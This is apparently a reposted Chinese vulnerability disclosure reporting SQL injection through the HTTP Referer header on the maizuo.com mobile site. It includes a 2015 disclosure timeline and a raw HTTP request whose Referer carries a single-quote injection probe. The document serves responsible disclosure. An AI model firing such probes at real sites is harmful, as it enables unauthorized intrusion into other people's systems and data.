卖座网一处SQL注射(Http Referer sqlinjection)

Posted 可我浪费着我寒冷的年华

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了卖座网一处SQL注射(Http Referer sqlinjection)相关的知识,希望对你有一定的参考价值。

漏洞作者: 猪猪侠认证白帽子

漏洞详情

披露状态:

2015-01-13: 细节已通知厂商并且等待厂商处理中
2015-01-14: 厂商已经确认,细节仅向厂商公开
2015-01-24: 细节向核心白帽子及相关领域专家公开
2015-02-03: 细节向普通白帽子公开
2015-02-13: 细节向实习白帽子公开
2015-02-27: 细节向公众公开

code 区域

GET /?cityId=13&cityName=%E5%B9%BF%E5%B7%9E HTTP/1.1

Host: m.maizuo.com

Proxy-Connection: keep-alive

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36

Referer: http://m.maizuo.com/city\'

Accept-Encoding: gzip, deflate, sdch

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4

Cookie:

 3.jpg

 

以上是关于卖座网一处SQL注射(Http Referer sqlinjection)的主要内容,如果未能解决你的问题,请参考以下文章

xml Miva - Smart-Breadcrumbs s.http_referer调整全局预渲染

关于SQL注入。

Http Referer的一些总结

DVWA系列のSQL注射

注射式攻击的注入攻击的使用:

误差与布尔和基于时间的盲注射之间的区别?